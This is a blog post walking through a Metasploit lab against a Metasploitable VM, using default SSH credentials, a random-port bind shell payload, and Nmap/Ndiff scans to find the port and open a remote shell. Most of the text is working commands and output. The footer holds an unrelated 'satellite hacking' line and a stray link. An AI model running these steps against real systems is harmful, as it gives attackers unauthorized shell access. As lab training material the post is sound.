Wednesday, September 6, 2017
HACK THE PLANET ! :)
Finding shell_bind_tcp_random_port with Nmap and Ndiff
Metasploitable
We're using Metasploitable for our vulnerable host. Just boot up the VM with host-only networking enabled, and you should be good to go. In this case, Metasploitable is at
172.16.126.129
.Nmap
First, we need to get a list of open ephemeral ports using Nmap. An ephemeral port is just a port that the OS assigns automatically and temporarily. Our payload will bind to one of these ports. We use a little shell magic to parse the ephemeral port range in
/proc/sys/net/ipv4/ip_local_port_range
and feed it to Nmap. We also need to save the scan results to before.xml
in order to use Ndiff later.root@kharak:~# nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX before.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 11:59 CST Initiating SYN Stealth Scan at 11:59 Scanning 172.16.126.129 [28233 ports] Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 51488/tcp on 172.16.126.129 Completed SYN Stealth Scan at 11:59, 0.31s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00014s latency). Not shown: 28229 closed ports PORT STATE SERVICE 33395/tcp open unknown 47431/tcp open unknown 49712/tcp open unknown 51488/tcp open unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)
As you can see, ports
{33395,47431,49712,51488}/tcp
are open in the ephemeral port range.Metasploit
Next, we need to exploit the system. We're using
exploit/multi/ssh/sshexec
here, since we know that Metasploitable has SSH open with default creds msfadmin:msfadmin
.
Make sure to use the payload
linux/x86/shell_bind_tcp_random_port
. That's why we're here, right? :)msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > setg RHOST 172.16.126.129
RHOST => 172.16.126.129
msf exploit(sshexec) > set USERNAME msfadmin
USERNAME => msfadmin
msf exploit(sshexec) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf exploit(sshexec) > set PAYLOAD linux/x86/shell_bind_tcp_random_port
PAYLOAD => linux/x86/shell_bind_tcp_random_port
msf exploit(sshexec) > exploit
[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress - 38.67% done (268/693 bytes)
[*] Command Stager progress - 100.00% done (693/693 bytes)
We won't get a session from this, since Metasploit doesn't know which port the payload is running on (by nature of the payload).
Nmap and Ndiff
Almost there! Now we need to scan the host again to get the new state of open ephemeral ports. We save the results to
after.xml
.
After that, we can use Ndiff on
before.xml
and after.xml
, revealing to us the port our bind shell is on.root@kharak:~# ^before^after nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX after.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 12:00 CST Initiating SYN Stealth Scan at 12:00 Scanning 172.16.126.129 [28233 ports] Discovered open port 51488/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 36503/tcp on 172.16.126.129 Completed SYN Stealth Scan at 12:01, 0.27s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00012s latency). Not shown: 28228 closed ports PORT STATE SERVICE 33395/tcp open unknown 36503/tcp open unknown 47431/tcp open unknown 49712/tcp open unknown 51488/tcp open unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB) root@kharak:~# ndiff {before,after}.xml -Nmap 6.00 scan initiated Thu Jan 02 11:59:37 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX before.xml --open --send-ip 172.16.126.129 +Nmap 6.00 scan initiated Thu Jan 02 12:00:59 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX after.xml --open --send-ip 172.16.126.129 172.16.126.129, 00:0C:29:3D:5A:9B: -Not shown: 28229 closed ports +Not shown: 28228 closed ports PORT STATE SERVICE VERSION +36503/tcp open
Our bind shell is on port
36503/tcp
!Metasploit
Finally, we can pop a shell with
exploit/multi/handler
. Just set PAYLOAD
to linux/x86/shell_bind_tcp
, LPORT
to the port you found with Ndiff, and hit exploit
! We already set RHOST
globally when we used exploit/multi/ssh/sshexec
. :)msf exploit(sshexec) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(handler) > set LPORT 36503
LPORT => 36503
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (172.16.126.1:41368 -> 172.16.126.129:36503) at 2014-01-02 12:01:39 -0600
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
And there you have it! We got a shell. :D
And there you have it! We got a shell. :D
Conclusion
If you're new to Metasploit and want to try your hand at some awesome hax, you can download it here. Hack the planet!
Subscribe to:
Posts (Atom)
Satellite hacking Intel 1 (BACK@WAR CyberArmy friends let´s start Satellite GPS navigation hack IT WILL HV A PRICE)
https://stackoverflow.com/questions/63010812/how-to-access-http-port-5001-from-public-internet